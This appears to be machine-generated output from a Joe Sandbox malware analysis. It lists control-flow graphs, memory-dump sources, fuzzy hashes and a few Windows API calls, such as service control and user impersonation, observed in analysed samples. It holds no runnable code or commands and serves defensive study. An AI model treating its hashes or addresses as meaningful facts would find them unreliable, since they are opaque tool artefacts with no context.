                                                                                                                                                                                                                                              control_flow_graph 120 7ff815f60c34-7ff815f60c3b 121 7ff815f60c3d-7ff815f60c45 120->121 122 7ff815f60c46-7ff815f60ce5 120->122 121->122 127 7ff815f60ce7-7ff815f60cf6 122->127 128 7ff815f60d40-7ff815f60daa OpenServiceA 122->128 127->128 129 7ff815f60cf8-7ff815f60cfb 127->129 133 7ff815f60dac 128->133 134 7ff815f60db2-7ff815f60de6 call 7ff815f60e02 128->134 131 7ff815f60cfd-7ff815f60d10 129->131 132 7ff815f60d35-7ff815f60d3d 129->132 135 7ff815f60d14-7ff815f60d27 131->135 136 7ff815f60d12 131->136 132->128 133->134 141 7ff815f60ded-7ff815f60e01 134->141 142 7ff815f60de8 134->142 135->135 138 7ff815f60d29-7ff815f60d31 135->138 136->135 138->132 142->141
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: OpenService
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3098006287-0
                                                                                                                                                                                                                                              • Opcode ID: 45513fd4fa26e6a2b614ed22e086d9a53496cd27b8ff6a9234bef1b1071097e1
                                                                                                                                                                                                                                              • Instruction ID: 2db6e77071c7439ffa06b902d771386b4fff597f0bd2dfa53cc7cdf818cb0a43
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45513fd4fa26e6a2b614ed22e086d9a53496cd27b8ff6a9234bef1b1071097e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0519230518A4D8FEB58EF28D8467E977E5FB59350F10422AE84EC7292DF74E841CB81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 143 7ff815f60148-7ff815f60ce5 149 7ff815f60ce7-7ff815f60cf6 143->149 150 7ff815f60d40-7ff815f60daa OpenServiceA 143->150 149->150 151 7ff815f60cf8-7ff815f60cfb 149->151 155 7ff815f60dac 150->155 156 7ff815f60db2-7ff815f60de6 call 7ff815f60e02 150->156 153 7ff815f60cfd-7ff815f60d10 151->153 154 7ff815f60d35-7ff815f60d3d 151->154 157 7ff815f60d14-7ff815f60d27 153->157 158 7ff815f60d12 153->158 154->150 155->156 163 7ff815f60ded-7ff815f60e01 156->163 164 7ff815f60de8 156->164 157->157 160 7ff815f60d29-7ff815f60d31 157->160 158->157 160->154 164->163
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ca62f1dddba7baa5d94c0dea030b7ef0e368545cfcbe1ec8cc71a813218b4ef0
                                                                                                                                                                                                                                              • Instruction ID: 336906fd31504b5eed8368aa5133dadd91b5da3096ddb03412c3fe8411459191
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca62f1dddba7baa5d94c0dea030b7ef0e368545cfcbe1ec8cc71a813218b4ef0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18518030918A4D8FEB58EE18D84A7B977E5FB59750F10422EE84EC7291DF74E841CB81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 165 7ff815f6108a-7ff815f610b3 166 7ff815f610be-7ff815f61152 FindCloseChangeNotification 165->166 167 7ff815f610b5-7ff815f610bd 165->167 170 7ff815f6115a-7ff815f61181 166->170 171 7ff815f61154 166->171 167->166 171->170
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                                                              • Opcode ID: 75d3deba5576697e0cab723a6b0e3f64fa1b907ce0a2f474c8a2489b97320be3
                                                                                                                                                                                                                                              • Instruction ID: 2351f8793f0d6ea221f578f72d86147d7f195cf8326a24f6e1556dd9632332b5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75d3deba5576697e0cab723a6b0e3f64fa1b907ce0a2f474c8a2489b97320be3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF31063190CA889FDB0ADB688805BE97FF0EF57320F0402AFD089C71A2DA696456CB51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 172 7ff815f60b4b-7ff815f60bb8 175 7ff815f60bba-7ff815f60bbf 172->175 176 7ff815f60bc2-7ff815f60bc7 172->176 175->176 177 7ff815f60bc9-7ff815f60bce 176->177 178 7ff815f60bd1-7ff815f60c08 OpenSCManagerW 176->178 177->178 179 7ff815f60c0a 178->179 180 7ff815f60c10-7ff815f60c2d 178->180 179->180
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ManagerOpen
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1889721586-0
                                                                                                                                                                                                                                              • Opcode ID: 50d18941c99afa19610d1d2e122bc4e362a243a94ca7b63121f6f6b0a241908b
                                                                                                                                                                                                                                              • Instruction ID: a3633fe700eadf7e3653fd0d9ebb199ecd5ddd99e970ad73250f97b07a8b23b1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50d18941c99afa19610d1d2e122bc4e362a243a94ca7b63121f6f6b0a241908b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9318E71908A1C8FDB28DF88D8896FAB7F0EB69721F10422ED04AD3651DF70A845CB81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 181 7ff815f61a3b-7ff815f61ad9 ControlService 184 7ff815f61adb 181->184 185 7ff815f61ae1-7ff815f61b09 181->185 184->185
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ControlService
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 253159669-0
                                                                                                                                                                                                                                              • Opcode ID: 1b9ddb319fc24d533053550f3d87bb0269e487c6fe2d6b3ede32a3d022002f6c
                                                                                                                                                                                                                                              • Instruction ID: 7f0a5d0e8266c15c59bc94196a2435cd69eed611f2154f8ac723354db7bc7a1c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b9ddb319fc24d533053550f3d87bb0269e487c6fe2d6b3ede32a3d022002f6c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8321A73191CA188FDB18DF9DD849AF97BE0EB65721F00413EE04AD3251DB64A446CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 186 7ff815f6176e-7ff815f61802 ImpersonateLoggedOnUser 189 7ff815f6180a-7ff815f61831 186->189 190 7ff815f61804 186->190 190->189
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2216092060-0
                                                                                                                                                                                                                                              • Opcode ID: 1be60646cc7e59ee8a861fac6f1d2c6f52a36cc651c8d3430de707f5906c847f
                                                                                                                                                                                                                                              • Instruction ID: df9dab387b58d87f4d0de3114bcb0ff96706e1cff27521cbe41c997dec1f9c96
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1be60646cc7e59ee8a861fac6f1d2c6f52a36cc651c8d3430de707f5906c847f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F21913190CA0C8FDB58DF68D849BF9BBE0FB65321F00426ED049D35A2DB65A856CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 364965bbbbfec16144bd863d629fee975e1207ff9bf395ddeccd362fb9e31f53
                                                                                                                                                                                                                                              • Instruction ID: 78e52f31a2418ea365fcd648e32cb7122bf326561501bb740ab06e5b6905c46b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 364965bbbbfec16144bd863d629fee975e1207ff9bf395ddeccd362fb9e31f53
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9228B357002158FDB14DB78D865B6E7BF6BF89250F1484A9E90ACB3A1DE34DC06CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5c68ea7408b0c9de59f55baec0d485fbda77e11b6540d6cbf6f91a54eb3dda11
                                                                                                                                                                                                                                              • Instruction ID: 13f01ff9d1538a98ee997ac0e63e8e9a4b19bcf9ecc64070ddd319da725c3fe0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c68ea7408b0c9de59f55baec0d485fbda77e11b6540d6cbf6f91a54eb3dda11
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F13FB38E41204EFCF16AB64E55199DB732FF9930BB1084AAEC1127B548B3F9982DF45
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e097f119c88e5b2f437aa326d04279a88873534f63b9f6f051a812b998bde343
                                                                                                                                                                                                                                              • Instruction ID: e61233c30503a5321dba1407624b94d51832817393063c8bfddf8a1dbe8bf43f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e097f119c88e5b2f437aa326d04279a88873534f63b9f6f051a812b998bde343
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A13FB38E41204EFCF16AB64E55199DB732FF9930BB1084AAEC1127B548B3F9982DF45
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3488ef6a28f01e75476f0a4ca12b01b6b92465d73899c131ebc269fea38e20ea
                                                                                                                                                                                                                                              • Instruction ID: 47de892f572cd45778f6d05d9250d8aca873a7992490964be528a0f9d483305d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3488ef6a28f01e75476f0a4ca12b01b6b92465d73899c131ebc269fea38e20ea
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56E14E34A00219DFDB54DF64D594AAEBBF6FF88310F148928E4169B3A0DB74EC41CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a3b364dcf74b39f2bbc4a06477504e666f4848532f73ee24057b456942b1c827
                                                                                                                                                                                                                                              • Instruction ID: 7b64738340d65265a16749b7d32d9f05875aeefdb5032be95dffc1e589087915
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3b364dcf74b39f2bbc4a06477504e666f4848532f73ee24057b456942b1c827
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9D10F74D05229CFDB68DF64C958BEDBBF2FB89300F1085AAD409A7290DB345A89CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 767f04b76692d1c2dd8d118b7a4701adf0326b9dd13b59e60924bb38f5017e77
                                                                                                                                                                                                                                              • Instruction ID: b8c7ed6b795819e893c0c861b1c7d8a63b45118caccea23786c2ddfacefc4dc7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 767f04b76692d1c2dd8d118b7a4701adf0326b9dd13b59e60924bb38f5017e77
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D81CF35B052109FDB119BB8D4245AEBFF2FF85710F14846AE84ADB381DA35DD0ACBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 86b718bae6dda7c8079e39bea942b4c48bcb5b42df81107a90e24e64e3f8ba47
                                                                                                                                                                                                                                              • Instruction ID: c29e3a7f9a32529b9af46e78eba6c58d078c20d12e80be70f383f838089a8eb6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86b718bae6dda7c8079e39bea942b4c48bcb5b42df81107a90e24e64e3f8ba47
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC716071E0061A8FDB14DFA9D4546AEBBF7BF89300F208529E809EB354DB709D46CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 315304ff50b6462b77f329391bcef2e0fc179a2baafa34ab6de2c7395c903b61
                                                                                                                                                                                                                                              • Instruction ID: 5ec4d11be3f3006a9c1786502d62ac380d7887ead1219c7df0ba6ebd41e385ab
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 315304ff50b6462b77f329391bcef2e0fc179a2baafa34ab6de2c7395c903b61
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC811C34A00219DFCB54DF64E5989ADBBF6FF88310B158959E816AB3A1DB70EC41CF90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 934f2b007aed8bd7a2771f273f8e6d80fda3de5b94226fc2d4f0323c36e491a8
                                                                                                                                                                                                                                              • Instruction ID: b3c8231ab6c16edf604ec53302e50574b1116871dfa1c140d1269edf45175ca0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 934f2b007aed8bd7a2771f273f8e6d80fda3de5b94226fc2d4f0323c36e491a8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81614F30911219CFCB14EFB8E45499DBBB6FF8A311F60566DE416B7290DF359889CB20
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f37c94adb5b897374704a08fd68de36ffc69a92dfefcd184ed9704b450234aa3
                                                                                                                                                                                                                                              • Instruction ID: d6b09aa6dd9abbaa5b3ece4ed1f48b2134ad9a556a859ac12e102dee35240d12
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f37c94adb5b897374704a08fd68de36ffc69a92dfefcd184ed9704b450234aa3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0613F30D11218CFCB14EFB8E4548ADBBB6FF8A311B60566DE416B7294DF359885CB24
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c5342cb47af47ab0c327d801163d244ae3fad21f1b87b38a835d710059f41751
                                                                                                                                                                                                                                              • Instruction ID: d609ac90228dacaf5deb7a2f1379723b0ef7a0d2bb2c0f310ba290bcd8e3114b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5342cb47af47ab0c327d801163d244ae3fad21f1b87b38a835d710059f41751
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC512B35A14219EFDF15DFA4E894DADBBB6BF88300F148415F812A7390DB749D41CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d4a7f9b048b5706a78a2ef8ac24f865d24acdb0097e3088042aee6abba78b030
                                                                                                                                                                                                                                              • Instruction ID: f505ad7a2c3e7f193fceea194c45c8c9e431c250c706504cf7c08ad1a36bf4e2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4a7f9b048b5706a78a2ef8ac24f865d24acdb0097e3088042aee6abba78b030
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94510274E01218CFCB18DFA9E9949EDBBB2FF88311F608529E809AB354DB355846CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a821f4d003ebdcd489168c3474f07248bf53f1095264a90d6cc1d88201d08950
                                                                                                                                                                                                                                              • Instruction ID: 7cabca84c7cd99ec3f9197e8736885c4e66b09a5dfbbd490de379dbc27933915
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a821f4d003ebdcd489168c3474f07248bf53f1095264a90d6cc1d88201d08950
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3651D534A44219DFDB14DFA4E994AADBBB6FF88310F158458E816AB360CB31EC42CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 624d944f7fe2f21dced1a69a4bdd4f28094b0fadb1ddb673df6110cc0bed45b6
                                                                                                                                                                                                                                              • Instruction ID: 23933de5b58bb5b2155223fe5407f46048651968aface5c537c0fdb79a7aff16
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 624d944f7fe2f21dced1a69a4bdd4f28094b0fadb1ddb673df6110cc0bed45b6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C731BC32B052148FDB14EB68D86477EBBE6FB85310F14816AE80ADB391DE359C4687A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 100f01c841d0dce57ce96df71e292cb4b95753e0deb36c9476ce20f099473ba7
                                                                                                                                                                                                                                              • Instruction ID: 2bb8f31e99c6efc52d3b3e793326387d9ef2c044fd860082a0d1a7277d718dd4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 100f01c841d0dce57ce96df71e292cb4b95753e0deb36c9476ce20f099473ba7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE3159387042148FD758DF68D4A9AAE7BF6BF88710F148468E9039B3A0DE359D02CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000005.00000002.402092404.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5020000_bAS06bx.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e22e338c32c60702278a29690eec82d1c741ec4fc2fbbcc56b7beac6f92845f7
                                                                                                                                                                                                                                              • Instruction ID: fdaa63dab89079d1beb69a6afaca4cc6d7e5271dc55cf60ffff45b5732138a50
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e22e338c32c60702278a29690eec82d1c741ec4fc2fbbcc56b7beac6f92845f7
